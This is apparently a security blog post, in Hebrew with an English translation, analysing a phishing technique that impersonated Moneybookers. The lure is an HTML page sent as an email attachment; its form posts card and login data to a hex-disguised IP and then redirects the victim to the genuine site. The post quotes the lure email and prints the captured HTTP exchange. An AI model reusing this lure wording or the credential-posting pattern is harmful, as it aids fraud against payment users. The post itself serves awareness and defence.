טכניקת פישינג חדשה – New phishing technique

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0x9f.0xe2.0x3a.0x88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

========== ENGLISH TRANSLATION ==========

Phishers have come up with a new method to conceal well from non-technical users the essence of what's happening.
Unlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) – this is what really happens with this approach:
1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt – that help lower the user mental defenses that wants to help.

The page links to logos and files from MoneyBookers, a thing which increase it's visual reliability level.

3. When the user fills up the details and hit submit, the data is posted to the crooks site, which stores them and return HTTP 302, which redirect the user to the MoneyBookers site.

POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0x9f.0xe2.0x3a.0x88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

A few things to pay attention to (in bold):
* The destination post address is 0x9f.0xe2.0x3a.0x88, which is an IP address in disguise.
* The user is redirected to the real secure MoneyBookers site, which makes him think this is where he have sent his data.

Nasty.
The problem is that you can't prevent the user from running local HTML file, and since the users will not know they have been fooled there will not be many reports about this. that's why automatic tools like browser web forgery detection – that are based on a central server that collects complaints from many users – will not work well because there will not be many complaints.

Facebook Comments